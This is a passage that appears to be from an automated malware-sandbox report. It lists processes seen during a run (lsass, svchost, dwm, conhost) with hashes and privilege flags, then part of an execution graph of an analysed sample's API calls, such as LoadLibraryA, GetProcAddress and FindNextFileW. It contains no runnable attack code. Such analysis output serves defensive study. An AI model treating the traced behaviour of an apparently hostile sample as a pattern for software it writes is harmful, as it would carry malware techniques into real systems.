                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:40
                                          Start time:08:54:45
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\lsass.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\lsass.exe
                                          Imagebase:0x7ff7ac940000
                                          File size:59'456 bytes
                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:41
                                          Start time:08:54:46
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:42
                                          Start time:08:54:46
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\dwm.exe
                                          Wow64 process (32bit):false
                                          Commandline:"dwm.exe"
                                          Imagebase:0x7ff68eb30000
                                          File size:94'720 bytes
                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:43
                                          Start time:08:54:48
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          General

                                          Target ID:44
                                          Start time:08:54:48
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:45
                                          Start time:08:54:49
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:46
                                          Start time:08:54:49
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:47
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:48
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:49
                                          Start time:08:54:50
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:50
                                          Start time:08:54:51
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:51
                                          Start time:08:54:51
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:52
                                          Start time:08:54:52
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:53
                                          Start time:08:54:52
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:54
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:55
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:56
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:57
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:58
                                          Start time:08:54:53
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                          Imagebase:0x7ff7403e0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:638
                                          Start time:08:55:04
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\Conhost.exe
                                          Wow64 process (32bit):
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          General

                                          Target ID:656
                                          Start time:08:55:12
                                          Start date:03/10/2024
                                          Path:C:\Windows\System32\Conhost.exe
                                          Wow64 process (32bit):
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:1%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:8%
                                            Total number of Nodes:1524
                                            Total number of Limit Nodes:2
                                            execution_graph 15983 253fc40bd34 15984 253fc40bd4d 15983->15984 15993 253fc40bd49 15983->15993 15998 253fc40e864 15984->15998 15989 253fc40bd6b 16024 253fc40bda8 15989->16024 15990 253fc40bd5f 15991 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15990->15991 15991->15993 15995 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15996 253fc40bd92 15995->15996 15997 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15996->15997 15997->15993 15999 253fc40e871 15998->15999 16003 253fc40bd52 15998->16003 16043 253fc40cacc 15999->16043 16001 253fc40e8a0 16048 253fc40e53c 16001->16048 16004 253fc40edc8 GetEnvironmentStringsW 16003->16004 16005 253fc40bd57 16004->16005 16007 253fc40edf8 16004->16007 16005->15989 16005->15990 16006 253fc40ece8 WideCharToMultiByte 16008 253fc40ee49 16006->16008 16007->16006 16009 253fc40ee53 FreeEnvironmentStringsW 16008->16009 16010 253fc40c5d0 14 API calls 16008->16010 16009->16005 16011 253fc40ee63 16010->16011 16012 253fc40ee74 16011->16012 16013 253fc40ee6b 16011->16013 16015 253fc40ece8 WideCharToMultiByte 16012->16015 16014 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16013->16014 16016 253fc40ee72 16014->16016 16017 253fc40ee97 16015->16017 16016->16009 16018 253fc40eea5 16017->16018 16019 253fc40ee9b 16017->16019 16021 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16018->16021 16020 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16019->16020 16022 253fc40eea3 FreeEnvironmentStringsW 16020->16022 16021->16022 16022->16005 16025 253fc40bdcd 16024->16025 16026 253fc40d220 _invalid_parameter_noinfo 13 API calls 16025->16026 16038 253fc40be03 16026->16038 16027 253fc40be0b 16028 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16027->16028 16030 253fc40bd73 16028->16030 16029 253fc40be6d 16031 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16029->16031 16030->15995 16031->16030 16032 253fc40d220 _invalid_parameter_noinfo 13 API calls 16032->16038 16033 253fc40be92 16220 253fc40bebc 16033->16220 16035 253fc40c328 __std_exception_copy 38 API calls 16035->16038 16037 253fc40bea6 16041 253fc40d06c _invalid_parameter_noinfo 17 API calls 16037->16041 16038->16027 16038->16029 16038->16032 16038->16033 16038->16035 16038->16037 16040 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16038->16040 16039 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16039->16027 16040->16038 16042 253fc40beb9 16041->16042 16044 253fc40cae8 FlsGetValue 16043->16044 16045 253fc40cae4 16043->16045 16044->16045 16046 253fc40cafe 16045->16046 16047 253fc40c940 _invalid_parameter_noinfo 13 API calls 16045->16047 16046->16001 16047->16046 16071 253fc40e7ac 16048->16071 16055 253fc40e5a7 16056 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16055->16056 16068 253fc40e58e 16056->16068 16057 253fc40e5b6 16057->16057 16097 253fc40e8e0 16057->16097 16060 253fc40e6b2 16061 253fc40d1f4 __std_exception_copy 13 API calls 16060->16061 16062 253fc40e6b7 16061->16062 16064 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16062->16064 16063 253fc40e70d 16070 253fc40e774 16063->16070 16108 253fc40e05c 16063->16108 16064->16068 16065 253fc40e6cc 16065->16063 16069 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16065->16069 16067 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16067->16068 16068->16003 16069->16063 16070->16067 16072 253fc40e7cf 16071->16072 16078 253fc40e7d9 16072->16078 16123 253fc40c558 EnterCriticalSection 16072->16123 16077 253fc40e571 16083 253fc40e22c 16077->16083 16078->16077 16080 253fc40cacc 14 API calls 16078->16080 16081 253fc40e8a0 16080->16081 16082 253fc40e53c 56 API calls 16081->16082 16082->16077 16124 253fc40dd78 16083->16124 16086 253fc40e24c GetOEMCP 16088 253fc40e273 16086->16088 16087 253fc40e25e 16087->16088 16089 253fc40e263 GetACP 16087->16089 16088->16068 16090 253fc40c5d0 16088->16090 16089->16088 16091 253fc40c61b 16090->16091 16095 253fc40c5df _invalid_parameter_noinfo 16090->16095 16092 253fc40d1f4 __std_exception_copy 13 API calls 16091->16092 16094 253fc40c619 16092->16094 16093 253fc40c602 HeapAlloc 16093->16094 16093->16095 16094->16055 16094->16057 16095->16091 16095->16093 16096 253fc40b470 _invalid_parameter_noinfo 2 API calls 16095->16096 16096->16095 16098 253fc40e22c 16 API calls 16097->16098 16099 253fc40e91b 16098->16099 16100 253fc40ea71 16099->16100 16102 253fc40e958 IsValidCodePage 16099->16102 16107 253fc40e972 16099->16107 16101 253fc408070 _invalid_parameter_noinfo 8 API calls 16100->16101 16103 253fc40e6a9 16101->16103 16102->16100 16104 253fc40e969 16102->16104 16103->16060 16103->16065 16105 253fc40e998 GetCPInfo 16104->16105 16104->16107 16105->16100 16105->16107 16140 253fc40e344 16107->16140 16219 253fc40c558 EnterCriticalSection 16108->16219 16125 253fc40dd9c 16124->16125 16131 253fc40dd97 16124->16131 16126 253fc40cab0 _invalid_parameter_noinfo 14 API calls 16125->16126 16125->16131 16127 253fc40ddb7 16126->16127 16132 253fc40ffb4 16127->16132 16131->16086 16131->16087 16133 253fc40ffc9 16132->16133 16134 253fc40ddda 16132->16134 16133->16134 16135 253fc410a40 _invalid_parameter_noinfo 14 API calls 16133->16135 16136 253fc410020 16134->16136 16135->16134 16137 253fc410035 16136->16137 16139 253fc410048 16136->16139 16138 253fc40e8c4 _invalid_parameter_noinfo 14 API calls 16137->16138 16137->16139 16138->16139 16139->16131 16141 253fc40e38f GetCPInfo 16140->16141 16142 253fc40e485 16140->16142 16141->16142 16147 253fc40e3a2 16141->16147 16143 253fc408070 _invalid_parameter_noinfo 8 API calls 16142->16143 16145 253fc40e524 16143->16145 16145->16100 16151 253fc411474 16147->16151 16152 253fc40dd78 14 API calls 16151->16152 16153 253fc4114b6 16152->16153 16171 253fc40ec58 16153->16171 16172 253fc40ec61 MultiByteToWideChar 16171->16172 16221 253fc40bec1 16220->16221 16225 253fc40be9a 16220->16225 16222 253fc40beea 16221->16222 16223 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16221->16223 16224 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 16222->16224 16223->16221 16224->16225 16225->16039 15041 253fc401e3c LoadLibraryA GetProcAddress 15042 253fc401e6f 15041->15042 15043 253fc401e62 SleepEx 15041->15043 15043->15043 17043 253fc431e3c LoadLibraryA GetProcAddress 17044 253fc431e62 Sleep 17043->17044 17045 253fc431e6f 17043->17045 17044->17044 15069 253fc40f440 GetProcessHeap 18171 253fc40ff40 18172 253fc40ff4b 18171->18172 18180 253fc412c24 18172->18180 18193 253fc40c558 EnterCriticalSection 18180->18193 17059 253fc40ae42 17060 253fc409324 _CreateFrameInfo 9 API calls 17059->17060 17061 253fc40ae4f __CxxCallCatchBlock 17060->17061 17062 253fc40ae93 RaiseException 17061->17062 17063 253fc40aeba 17062->17063 17064 253fc409978 __CxxCallCatchBlock 9 API calls 17063->17064 17069 253fc40aec2 17064->17069 17065 253fc40aeeb __CxxCallCatchBlock 17066 253fc409324 _CreateFrameInfo 9 API calls 17065->17066 17067 253fc40aefe 17066->17067 17068 253fc409324 _CreateFrameInfo 9 API calls 17067->17068 17070 253fc40af07 17068->17070 17069->17065 17071 253fc408ff8 __CxxCallCatchBlock 9 API calls 17069->17071 17071->17065 15199 253fc414848 15202 253fc40904c 15199->15202 15203 253fc409064 15202->15203 15204 253fc409076 15202->15204 15203->15204 15206 253fc40906c 15203->15206 15218 253fc409324 15204->15218 15208 253fc409074 15206->15208 15209 253fc409324 _CreateFrameInfo 9 API calls 15206->15209 15207 253fc40907b 15207->15208 15210 253fc409324 _CreateFrameInfo 9 API calls 15207->15210 15211 253fc40909b 15209->15211 15210->15208 15212 253fc409324 _CreateFrameInfo 9 API calls 15211->15212 15213 253fc4090a8 15212->15213 15221 253fc40c2f4 15213->15221 15224 253fc409340 15218->15224 15220 253fc40932d 15220->15207 15249 253fc40cab0 15221->15249 15223 253fc40c2fd 15225 253fc409358 15224->15225 15226 253fc40935f GetLastError 15224->15226 15225->15220 15236 253fc409c8c 15226->15236 15240 253fc409aac 15236->15240 15241 253fc409b96 TlsGetValue 15240->15241 15246 253fc409af0 __vcrt_FlsAlloc 15240->15246 15242 253fc409b1e LoadLibraryExW 15244 253fc409bbd 15242->15244 15245 253fc409b3f GetLastError 15242->15245 15243 253fc409bdd GetProcAddress 15243->15241 15244->15243 15247 253fc409bd4 FreeLibrary 15244->15247 15245->15246 15246->15241 15246->15242 15246->15243 15248 253fc409b61 LoadLibraryExW 15246->15248 15247->15243 15248->15244 15248->15246 15257 253fc40cb10 15249->15257 15251 253fc40cabe 15251->15223 15252 253fc40cab9 15252->15251 15253 253fc40cae8 FlsGetValue 15252->15253 15255 253fc40cae4 15252->15255 15253->15255 15254 253fc40cafe 15254->15223 15255->15254 15266 253fc40c940 GetLastError 15255->15266 15258 253fc40cb59 GetLastError 15257->15258 15263 253fc40cb2f __std_exception_copy 15257->15263 15259 253fc40cb6c 15258->15259 15260 253fc40cb8a SetLastError 15259->15260 15262 253fc40cb87 15259->15262 15264 253fc40c940 _invalid_parameter_noinfo 11 API calls 15259->15264 15261 253fc40cb54 15260->15261 15261->15252 15262->15260 15263->15261 15265 253fc40c940 _invalid_parameter_noinfo 11 API calls 15263->15265 15264->15262 15265->15261 15267 253fc40c966 15266->15267 15268 253fc40c96c SetLastError 15267->15268 15284 253fc40d220 15267->15284 15269 253fc40c9e5 15268->15269 15269->15254 15272 253fc40c9a5 FlsSetValue 15275 253fc40c9c8 15272->15275 15276 253fc40c9b1 FlsSetValue 15272->15276 15273 253fc40c995 FlsSetValue 15291 253fc40d2a0 15273->15291 15297 253fc40c758 15275->15297 15278 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 15276->15278 15281 253fc40c9c6 SetLastError 15278->15281 15281->15269 15290 253fc40d231 _invalid_parameter_noinfo 15284->15290 15285 253fc40d282 15305 253fc40d1f4 15285->15305 15286 253fc40d266 HeapAlloc 15288 253fc40c987 15286->15288 15286->15290 15288->15272 15288->15273 15290->15285 15290->15286 15302 253fc40b470 15290->15302 15292 253fc40d2a5 HeapFree 15291->15292 15293 253fc40c9a3 15291->15293 15292->15293 15294 253fc40d2c0 GetLastError 15292->15294 15293->15268 15295 253fc40d2cd Concurrency::details::SchedulerProxy::DeleteThis 15294->15295 15296 253fc40d1f4 __std_exception_copy 11 API calls 15295->15296 15296->15293 15314 253fc40c630 15297->15314 15308 253fc40b4c0 15302->15308 15306 253fc40cb10 __std_exception_copy 13 API calls 15305->15306 15307 253fc40d1fd 15306->15307 15307->15288 15313 253fc40c558 EnterCriticalSection 15308->15313 15326 253fc40c558 EnterCriticalSection 15314->15326 16469 253fc40ad48 16470 253fc409324 _CreateFrameInfo 9 API calls 16469->16470 16471 253fc40ad7d 16470->16471 16472 253fc409324 _CreateFrameInfo 9 API calls 16471->16472 16473 253fc40ad8b __except_validate_context_record 16472->16473 16474 253fc409324 _CreateFrameInfo 9 API calls 16473->16474 16475 253fc40adcf 16474->16475 16476 253fc409324 _CreateFrameInfo 9 API calls 16475->16476 16477 253fc40add8 16476->16477 16478 253fc409324 _CreateFrameInfo 9 API calls 16477->16478 16479 253fc40ade1 16478->16479 16492 253fc40993c 16479->16492 16482 253fc409324 _CreateFrameInfo 9 API calls 16483 253fc40ae11 __CxxCallCatchBlock 16482->16483 16499 253fc409978 16483->16499 16485 253fc40aeeb __CxxCallCatchBlock 16486 253fc409324 _CreateFrameInfo 9 API calls 16485->16486 16487 253fc40aefe 16486->16487 16488 253fc409324 _CreateFrameInfo 9 API calls 16487->16488 16490 253fc40af07 16488->16490 16493 253fc409324 _CreateFrameInfo 9 API calls 16492->16493 16494 253fc40994d 16493->16494 16495 253fc409324 _CreateFrameInfo 9 API calls 16494->16495 16496 253fc409958 16494->16496 16495->16496 16497 253fc409324 _CreateFrameInfo 9 API calls 16496->16497 16498 253fc409969 16497->16498 16498->16482 16498->16483 16500 253fc409324 _CreateFrameInfo 9 API calls 16499->16500 16501 253fc40998a 16500->16501 16502 253fc4099c5 16501->16502 16503 253fc409324 _CreateFrameInfo 9 API calls 16501->16503 16504 253fc409995 16503->16504 16504->16502 16505 253fc409324 _CreateFrameInfo 9 API calls 16504->16505 16506 253fc4099b6 16505->16506 16506->16485 16507 253fc408ff8 16506->16507 16508 253fc409324 _CreateFrameInfo 9 API calls 16507->16508 16509 253fc409006 16508->16509 16509->16485 17072 253fc40824c 17073 253fc408270 __scrt_acquire_startup_lock 17072->17073 17074 253fc40b581 17073->17074 17075 253fc40cb10 __std_exception_copy 13 API calls 17073->17075 17076 253fc40b5aa 17075->17076 16556 253fc41494f 16557 253fc41495e 16556->16557 16559 253fc414968 16556->16559 16560 253fc40c5ac LeaveCriticalSection 16557->16560 17082 253fc402e54 17084 253fc402ea8 17082->17084 17083 253fc402ec3 17084->17083 17086 253fc4037f4 17084->17086 17087 253fc40388a 17086->17087 17089 253fc403819 17086->17089 17087->17083 17088 253fc403f88 StrCmpNIW 17088->17089 17089->17087 17089->17088 17090 253fc401e08 StrCmpIW StrCmpW 17089->17090 17090->17089 17330 253fc40d658 17331 253fc40d694 17330->17331 17332 253fc40d67d 17330->17332 17339 253fc40d724 17331->17339 17345 253fc40d6da 17331->17345 17347 253fc40d7b6 17331->17347 17363 253fc40d894 17331->17363 17425 253fc40da18 17331->17425 17333 253fc40d1f4 __std_exception_copy 13 API calls 17332->17333 17334 253fc40d682 17333->17334 17335 253fc40d04c _invalid_parameter_noinfo 38 API calls 17334->17335 17338 253fc40d68d 17335->17338 17336 253fc40bb54 13 API calls 17337 253fc40d77c 17336->17337 17340 253fc40d784 17337->17340 17350 253fc40d7d7 17337->17350 17339->17336 17344 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17340->17344 17343 253fc40d836 17348 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17343->17348 17346 253fc40d78b 17344->17346 17349 253fc40d6fd 17345->17349 17352 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17345->17352 17346->17349 17353 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17346->17353 17347->17349 17356 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17347->17356 17351 253fc40d841 17348->17351 17354 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17349->17354 17350->17343 17350->17350 17360 253fc40d87c 17350->17360 17462 253fc410eb8 17350->17462 17355 253fc40d85a 17351->17355 17359 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17351->17359 17352->17345 17353->17346 17354->17338 17357 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17355->17357 17356->17347 17357->17338 17359->17351 17361 253fc40d06c _invalid_parameter_noinfo 17 API calls 17360->17361 17362 253fc40d891 17361->17362 17364 253fc40d8c2 17363->17364 17364->17364 17365 253fc40d8de 17364->17365 17366 253fc40d220 _invalid_parameter_noinfo 13 API calls 17364->17366 17365->17331 17367 253fc40d90d 17366->17367 17368 253fc40d926 17367->17368 17369 253fc410eb8 38 API calls 17367->17369 17370 253fc410eb8 38 API calls 17368->17370 17372 253fc40d9fc 17368->17372 17369->17368 17371 253fc40d943 17370->17371 17371->17372 17374 253fc40d97f 17371->17374 17375 253fc40d98d 17371->17375 17376 253fc40d962 17371->17376 17373 253fc40d06c _invalid_parameter_noinfo 17 API calls 17372->17373 17386 253fc40da17 17373->17386 17377 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17374->17377 17378 253fc40d977 17375->17378 17471 253fc40eee0 17375->17471 17379 253fc40d220 _invalid_parameter_noinfo 13 API calls 17376->17379 17377->17372 17378->17374 17383 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17378->17383 17380 253fc40d96d 17379->17380 17384 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17380->17384 17382 253fc40da7a 17390 253fc40da8c 17382->17390 17394 253fc40daa1 17382->17394 17383->17374 17384->17378 17385 253fc40d9b5 17387 253fc40d9ba 17385->17387 17388 253fc40d9d0 17385->17388 17386->17382 17480 253fc4113d8 17386->17480 17392 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17387->17392 17393 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17388->17393 17391 253fc40d894 52 API calls 17390->17391 17407 253fc40da9c 17391->17407 17392->17378 17393->17374 17396 253fc40dd78 14 API calls 17394->17396 17395 253fc408070 _invalid_parameter_noinfo 8 API calls 17397 253fc40dd64 17395->17397 17398 253fc40db0b 17396->17398 17397->17331 17399 253fc40db1a 17398->17399 17400 253fc40f198 9 API calls 17398->17400 17489 253fc40d30c 17399->17489 17400->17399 17403 253fc40dba8 17404 253fc40d894 52 API calls 17403->17404 17405 253fc40dbb8 17404->17405 17405->17407 17408 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17405->17408 17406 253fc40dd78 14 API calls 17413 253fc40dbd2 17406->17413 17407->17395 17408->17407 17409 253fc40f198 9 API calls 17409->17413 17411 253fc40d894 52 API calls 17411->17413 17412 253fc40dcc8 FindNextFileW 17412->17413 17414 253fc40dce0 17412->17414 17413->17406 17413->17409 17413->17411 17413->17412 17415 253fc40dd2a 17413->17415 17422 253fc40d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 17413->17422 17511 253fc40d4ac 17413->17511 17416 253fc40dd0c FindClose 17414->17416 17533 253fc410b20 17414->17533 17417 253fc40dd38 FindClose 17415->17417 17420 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17415->17420 17416->17407 17419 253fc40dd1c 17416->17419 17417->17407 17421 253fc40dd48 17417->17421 17423 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17419->17423 17420->17417 17424 253fc40d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17421->17424 17422->17413 17423->17407 17424->17407 17426 253fc40da58 17425->17426 17427 253fc40da7a 17425->17427 17426->17427 17428 253fc4113d8 38 API calls 17426->17428 17429 253fc40da8c 17427->17429 17431 253fc40daa1 17427->17431 17428->17426 17430 253fc40d894 56 API calls 17429->17430 17444 253fc40da9c 17430->17444 17433 253fc40dd78 14 API calls 17431->17433 17432 253fc408070 _invalid_parameter_noinfo 8 API calls 17434 253fc40dd64 17432->17434 17435 253fc40db0b 17433->17435 17434->17331 17436 253fc40f198 9 API calls 17435->17436 17437 253fc40db1a 17435->17437 17436->17437 17438 253fc40d30c 16 API calls 17437->17438 17439 